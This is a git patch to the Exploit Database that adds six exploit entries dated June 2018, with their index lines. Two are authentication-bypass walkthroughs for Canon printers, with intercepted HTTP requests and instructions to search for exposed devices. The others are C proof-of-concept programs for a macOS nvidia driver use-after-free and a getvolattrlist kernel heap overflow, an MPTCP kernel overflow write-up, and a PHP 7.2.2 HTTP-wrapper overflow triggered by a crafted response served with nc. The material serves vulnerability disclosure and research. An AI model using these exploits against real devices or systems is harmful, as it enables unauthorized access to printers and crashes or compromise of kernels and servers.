From 0909e63d9ec8ae420862c4bd86ffd820a8998b79 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 7 Jun 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-06-07 6 changes to exploits/shellcodes PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass Canon MF210/MF220 - Authenticaton Bypass --- exploits/hardware/webapps/44844.txt | 184 ++++++++++++++++ exploits/hardware/webapps/44845.txt | 323 ++++++++++++++++++++++++++++ exploits/macos/dos/44847.c | 147 +++++++++++++ exploits/multiple/dos/44848.c | 105 +++++++++ exploits/multiple/dos/44849.txt | 78 +++++++ exploits/php/dos/44846.txt | 108 ++++++++++ files_exploits.csv | 6 + 7 files changed, 951 insertions(+) create mode 100644 exploits/hardware/webapps/44844.txt create mode 100644 exploits/hardware/webapps/44845.txt create mode 100644 exploits/macos/dos/44847.c create mode 100644 exploits/multiple/dos/44848.c create mode 100644 exploits/multiple/dos/44849.txt create mode 100644 exploits/php/dos/44846.txt diff --git a/exploits/hardware/webapps/44844.txt b/exploits/hardware/webapps/44844.txt new file mode 100644 index 000000000..323724488 --- /dev/null +++ b/exploits/hardware/webapps/44844.txt @@ -0,0 +1,184 @@ +# Exploit Title: [ Incorrect Access Control in Canon LBP6650, LBP3370, LBP3460, LBP7750C] +# Date: [3.6.2018] +# Exploit Author: [Huy Kha] +# Vendor Homepage: [http://global.canon.com] +# Software Link: [ Website ] +# Severity: High +# Version: LBP6650, LBP3370, LBP3460, LBP7750C +# Tested on: Mozilla FireFox + +# Description : An issue was discovered on Canon LBP6650, LBP3370, LBP3460, LBP7750C printers. +It is possible for a remote (unauthenticated) attacker to bypass the Administrator Mode authentication without a password at any URL of the device that requires authentication. + + + +# PoC : +Start searching for Canon LBP6650 ,LBP3370, LBP3460 printers. +You can recognize them with the /tlogin.cgi parameter, but the version is +also been displayed on the webinterface. +https://imgur.com/a/QE3GfLw + +# Example : + +1. Go to the following url: http://127.0.0.1/tlogin.cgi +2. Click on Administrator Mode +3. Intercept now the request with Burpsuite and click on 'Ok'' to login. +And forward the request till you get the ''/frame.cgi?page=DevStatus'' +parameter. + + +# Request : + +GET /frame.cgi?page=DevStatus HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/tlogin.cgi +Cookie: CookieID=1610705327:; Login=11 +Connection: close +Upgrade-Insecure-Requests: 1 + +# Response : + +HTTP/1.1 200 OK +Date: MON, 05 JAN 1970 16:35:57 GMT +Server: CANON HTTP Server +Content-Type: text/html +Content-Length: 5652 + + + + + + + + + + + + + + + + + + + + +<body> +</body> + + + + + + +# Do we have now access to the printer with Admin Mode? : Yes + +# How to fix this? : Remove the default password and add a new (strong) password. + + +# Screenshot : https://imgur.com/a/ISDL1Qf (Administrator Mode) \ No newline at end of file diff --git a/exploits/hardware/webapps/44845.txt b/exploits/hardware/webapps/44845.txt new file mode 100644 index 000000000..8876ca087 --- /dev/null +++ b/exploits/hardware/webapps/44845.txt @@ -0,0 +1,323 @@ +# Exploit Title: [ Incorrect Access Control in Canon MF210 & MF220 Series ] +# Date: [4.6.2018] +# Exploit Author: [Huy Kha] +# Vendor Homepage: [http://global.canon.com] +# Software Link: [ Website ] +# Version: MF210 & MF20 Series +# Severity: High +# Tested on: Mozilla FireFox +# Description : An issue was discovered on Canon MF210 & MF220 printers webinterface. +It is possible for a remote (unauthenticated) attacker to bypass the System Manager Mode authentication without a PIN at any URL of the device that requires authentication. + + + +# PoC : +Start searching for Canon MF210 & MF220 printers. +You can recognize them with the /login.html parameter, but the version is +also been displayed on the webinterface. +https://imgur.com/a/5ON4HF6 + +# Example : + +1. Go to the following url: http://127.0.0.1/login.html +2. Click on System Manager Mode +3. Intercept now the request with Burpsuite and click then on 'Ok'' to login. And forward the request till you get the ''/portal_top.html'' parameter. + + +# Request : + +GET /portal_top.html HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://129.2.52.116/login.html +Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC +Connection: close +Upgrade-Insecure-Requests: 1 + +# Response : + +HTTP/1.1 200 OK +Expires: Thu, 1 Jan 1998 00:00:00 GMT +Content-Type: text/html +Content-Length: 6119 +Pragma: no-cache +Cache-Control: no-store, no-cache, max-age=0 +Connection: close +Set-Cookie: +fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly + + + + + + + + + + + + + + + + + + +Remote UI: Portal: MF220 Series: MF220 Series + + +

+

+

+

+

+ + + + + +

+

+ + ++++ + + + + + + + + + + + + + + +


Device Name:	MF220 Series
Product Name:	MF220 Series
Location:

+

+

+

+

+ +

+

+

+

+

+

+

+

+

+

Remote UI: Portal

+

+Mail to System Manager +

+

+

+

+

+

+

+

+

+

Device Info

+

+

Last Updated:06/04/2018 04:27 AM

+

+

+

+

+

+

+

Contents

+

+

+

+

+

Device Basic Information

+

+

Device Status

+ ++++ + + + + + + + + + + + + + + + + +

Printer:	+Sleep mode. +
Scanner:	+Sleep mode. +
Fax:	+Ready to send or receive faxes. +

+

+

+

Error Information

+

No errors.

+ +

+

+

+

Consumables Information

+

+ +

Paper Information

+ ++++++ + + + + + + + + + + + + + + + + + + + + + + + + + + +

Paper Source	Paper Level	Paper Size	Paper Type
Multi-Purpose Tray	None	LTR	Plain (16 lb Bond-23 lb Bond)
Drawer 1	OK	LTR	Plain (16 lb Bond-23 lb Bond)

+

+

+

Cartridge Information

+ ++++ + + + + + + + + + + + + +

Color	Level
Black	60%

+

+

+

+

Support Link

+

+ ++++ + + + + + + + + +

Support Link:

+

+

+

+

+

+

+

+

+ +

+

+

+

+

+

+

Copyright CANON INC. 2014

+

+

+ + + + + + +# Do we have now access to the printer with System Manager Mode? : Yes + +# Screenshot : https://imgur.com/a/U6oBYNV + +# How to fix this? : Remove the default password and add a new (strong) password. \ No newline at end of file diff --git a/exploits/macos/dos/44847.c b/exploits/macos/dos/44847.c new file mode 100644 index 000000000..1bea54a1c --- /dev/null +++ b/exploits/macos/dos/44847.c @@ -0,0 +1,147 @@ +/* +nvDevice::SetAppSupportBits is external method 0x107 of the nvAccelerator IOService. + +It calls task_deallocate without locking. Two threads can race calling this external method to drop +two task references when only one is held. + +Note that the repro forks a child which give the nvAccelerator a different task otherwise +the repro is more likely to leak task references than panic. +*/ + +// ianbeer + +#if 0 +MacOS kernel UAF due to lack of locking in nvidia GeForce driver + +nvDevice::SetAppSupportBits is external method 0x107 of the nvAccelerator IOService. + +It calls task_deallocate without locking. Two threads can race calling this external method to drop +two task references when only one is held. + +Note that the repro forks a child which give the nvAccelerator a different task otherwise +the repro is more likely to leak task references than panic. +#endif + +// build: clang -o nvtask nvtask.c -framework IOKit +// run: while true; do ./nvtask; done + +#include +#include +#include +#include +#include +#include + +#include + +#include +#include + +#include + +uint64_t set_app_support_bits(mach_port_t conn) { + kern_return_t err; + + uint64_t inputScalar[16]; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096]; + size_t inputStructCnt = 0; + + uint64_t outputScalar[16]; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096]; + size_t outputStructCnt = 0; + + inputStructCnt = 1; + outputStructCnt = 1; + + inputStruct[0] = 0xff; + + err = IOConnectCallMethod( + conn, + 0x107, + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err != KERN_SUCCESS){ + printf("IOConnectCall error: %x\n", err); + } else{ + printf("worked?\n"); + } + + return 0; +} + + +volatile int go = 0; +volatile int running = 0; +void* thread_func(void* arg) { + mach_port_t conn = (mach_port_t)arg; + printf("thread running\n"); + running = 1; + while(!go){;} + set_app_support_bits(conn); + return 0; +} + +int main(int argc, char** argv){ + pid_t child_pid = fork(); + if (child_pid == -1) { + printf("fork failed\n"); + return 0; + } + if (child_pid) { + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("nvAccelerator")); + if (service == MACH_PORT_NULL) { + printf("unable to find service\n"); + return 0; + } + printf("got service: 0x%x\n", service); + + io_connect_t conn = MACH_PORT_NULL; + kern_return_t err = IOServiceOpen(service, mach_task_self(), 5, &conn); // nvDevice + if (err != KERN_SUCCESS) { + printf("unable to open ioservice\n"); + return 0; + } + printf("got service\n"); + pthread_t th; + pthread_create(&th, NULL, thread_func, (void*)conn); + + while(!running){;} + go = 1; + set_app_support_bits(conn); + + pthread_join(th, NULL); + + int loc = 0; + wait(&loc); + } else { + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("nvAccelerator")); + if (service == MACH_PORT_NULL) { + printf("unable to find service\n"); + return 0; + } + printf("got service: 0x%x\n", service); + + io_connect_t conn = MACH_PORT_NULL; + kern_return_t err = IOServiceOpen(service, mach_task_self(), 5, &conn); // nvDevice + if (err != KERN_SUCCESS) { + printf("unable to open ioservice\n"); + return 0; + } + printf("got service\n"); + set_app_support_bits(conn); + + } + + return 0; +} \ No newline at end of file diff --git a/exploits/multiple/dos/44848.c b/exploits/multiple/dos/44848.c new file mode 100644 index 000000000..9cd8e031a --- /dev/null +++ b/exploits/multiple/dos/44848.c @@ -0,0 +1,105 @@ +/* +getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall. + +When allocating a kernel buffer to serialize the attr list to there's the following comment: + + /* + * Allocate a target buffer for attribute results. + * Note that since we won't ever copy out more than the caller requested, + * we never need to allocate more than they offer. + */ + ab.allocated = ulmin(bufferSize, fixedsize + varsize); + if (ab.allocated > ATTR_MAX_BUFFER) { + error = ENOMEM; + VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER); + goto out; + } + MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK); + +The problem is that the code doesn't then correctly handle the case when the user supplied buffer size +is smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code: + + /* Return attribute set output if requested. */ + if (return_valid) { + ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS; + if (pack_invalid) { + /* Only report the attributes that are valid */ + ab.actual.commonattr &= ab.valid.commonattr; + ab.actual.volattr &= ab.valid.volattr; + } + bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual)); + } + +There's no check that the allocated buffer is big enough to hold at least that. + +Tested on MacOS 10.13.4 (17E199) +*/ + +// ianbeer +#if 0 +MacOS/iOS kernel heap overflow due to lack of lower size check in getvolattrlist + +getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall. + +When allocating a kernel buffer to serialize the attr list to there's the following comment: + + /* + * Allocate a target buffer for attribute results. + * Note that since we won't ever copy out more than the caller requested, + * we never need to allocate more than they offer. + */ + ab.allocated = ulmin(bufferSize, fixedsize + varsize); + if (ab.allocated > ATTR_MAX_BUFFER) { + error = ENOMEM; + VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER); + goto out; + } + MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK); + +The problem is that the code doesn't then correctly handle the case when the user supplied buffer size +is smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code: + + /* Return attribute set output if requested. */ + if (return_valid) { + ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS; + if (pack_invalid) { + /* Only report the attributes that are valid */ + ab.actual.commonattr &= ab.valid.commonattr; + ab.actual.volattr &= ab.valid.volattr; + } + bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual)); + } + +There's no check that the allocated buffer is big enough to hold at least that. + +Tested on MacOS 10.13.4 (17E199) + +#endif + +#include +#include +#include +#include +#include + +int main() { + int fd = open("/", O_RDONLY); + if (fd == -1) { + perror("unable to open fs root\n"); + return 0; + } + + struct attrlist al = {0}; + + al.bitmapcount = ATTR_BIT_MAP_COUNT; + al.volattr = 0xfff; + al.commonattr = ATTR_CMN_RETURNED_ATTRS; + + size_t attrBufSize = 16; + void* attrBuf = malloc(attrBufSize); + int options = 0; + + int err = fgetattrlist(fd, &al, attrBuf, attrBufSize, options); + printf("err: %d\n", err); + return 0; +} \ No newline at end of file diff --git a/exploits/multiple/dos/44849.txt b/exploits/multiple/dos/44849.txt new file mode 100644 index 000000000..98bcb3de4 --- /dev/null +++ b/exploits/multiple/dos/44849.txt @@ -0,0 +1,78 @@ +mptcp_usr_connectx is the handler for the connectx syscall for the AP_MULTIPATH socket family. + +The logic of this function fails to correctly handle source and destination sockaddrs which aren't +AF_INET or AF_INET6: + +// verify sa_len for AF_INET: + + if (dst->sa_family == AF_INET && + dst->sa_len != sizeof(mpte->__mpte_dst_v4)) { + mptcplog((LOG_ERR, "%s IPv4 dst len %u\n", __func__, + dst->sa_len), + MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR); + error = EINVAL; + goto out; + } + +// verify sa_len for AF_INET6: + + if (dst->sa_family == AF_INET6 && + dst->sa_len != sizeof(mpte->__mpte_dst_v6)) { + mptcplog((LOG_ERR, "%s IPv6 dst len %u\n", __func__, + dst->sa_len), + MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR); + error = EINVAL; + goto out; + } + +// code doesn't bail if sa_family was neither AF_INET nor AF_INET6 + + if (!(mpte->mpte_flags & MPTE_SVCTYPE_CHECKED)) { + if (mptcp_entitlement_check(mp_so) < 0) { + error = EPERM; + goto out; + } + + mpte->mpte_flags |= MPTE_SVCTYPE_CHECKED; + } + +// memcpy with sa_len up to 255: + + if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) { + memcpy(&mpte->mpte_dst, dst, dst->sa_len); + } + +This PoC triggers the issue to overwrite the mpte_itfinfo field leading to a controlled pointer +being passed to kfree when the socket is closed. + +Please note that these lengths seem to be trusted in multiple places - I would strongly suggest auditing +this code quite thoroughly, especially as mptcp can be reached from more places as of iOS 11. + +Note that the MPTCP code does seem to be quite buggy; trying to get a nice PoC working for this buffer overflow +bug I accidentally triggered the following error path: + + error = socreate_internal(dom, so, SOCK_STREAM, IPPROTO_TCP, p, + SOCF_ASYNC, PROC_NULL); + mpte_lock(mpte); + if (error) { + mptcplog((LOG_ERR, "%s: subflow socreate mp_so 0x%llx unable to create subflow socket error %d\n", + (u_int64_t)VM_KERNEL_ADDRPERM(mp_so), error), + MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR); + + proc_rele(p); + + mptcp_subflow_free(mpts); + return (error); + } + +note that first argument to mptcplog has one too few arguments. It's probably not so interesting from a security +POV but is indicative of untested code (this error path has clearly never run as it will always kernel panic.) + +This PoC is for MacOS but note that this code is reachable on iOS 11 from inside the app sandbox if you give yourself +the multipath entitlement (which app store apps can now use.) + +Just run this PoC as root on MacOS for easy repro. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44849.zip \ No newline at end of file diff --git a/exploits/php/dos/44846.txt b/exploits/php/dos/44846.txt new file mode 100644 index 000000000..b5a8658d5 --- /dev/null +++ b/exploits/php/dos/44846.txt @@ -0,0 +1,108 @@ +Description: +------------ +The latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at: + +php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 + + if (tmp_line[tmp_line_len - 1] == '\n') { + --tmp_line_len; + if (tmp_line[tmp_line_len - 1] == '\r') { + --tmp_line_len; + } +} + +If the proceeding buffer contains '\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed. + +$ bin/php --version +PHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS ) +Copyright (c) 1997-2018 The PHP Group +Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies + + +Test script: +--------------- +$ xxd -g 1 poc +0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100.. + +$ nc -vvlp 8080 < poc +Listening on [0.0.0.0] (family 0, port 8080) +Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083) +GET / HTTP/1.0 +Host: localhost:8080 +Connection: close + +$ bin/php -r 'file_get_contents("http://localhost:8080");' + +Expected result: +---------------- +NO CRASH + +Actual result: +-------------- +$ bin/php -r 'file_get_contents("http://localhost:8080");' +================================================================= +==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac +READ of size 1 at 0xbfc038ef thread T0 + #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 + #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979 + #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027 + #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550 + #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224 + #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573 + #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731 + #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760 + #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082 + #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123 + #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134 + #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042 + #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404 + #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82) + #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0) +Address 0xbfc038ef is located at offset 607 in frame of T0's stack: + This frame has 13 object(s): + [32, 36) 'transport_string' + [96, 100) 'errstr' + [160, 164) 'http_header_line_length' + [224, 232) 'timeout' + [288, 296) 'req_buf' + [352, 360) 'tmpstr' + [416, 432) 'ssl_proxy_peer_name' + [480, 496) 'http_header' + [544, 576) 'buf' + [608, 736) 'tmp_line' + [768, 1792) 'location' + [1824, 2848) 'new_path' + [2880, 3904) 'loc_path' +HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext + (longjmp and C++ exceptions *are* supported) +SUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex +Shadow bytes around the buggy address: + 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4 + 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4 + 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4 + 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00 +=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00 + 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 + 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap righ redzone: fb + Freed Heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + ASan internal: fe +==26249== ABORTING +Aborted \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f1e03f75a..343b49a8c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5987,6 +5987,10 @@ id,file,description,date,author,type,platform,port 44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows, 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple, 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux, +44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php, +44847,exploits/macos/dos/44847.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos, +44848,exploits/multiple/dos/44848.c,"macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple, +44849,exploits/multiple/dos/44849.txt,"XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP",2018-06-06,"Google Security Research",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -39507,3 +39511,5 @@ id,file,description,date,author,type,platform,port 44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php, 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware, 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux, +44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware, +44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,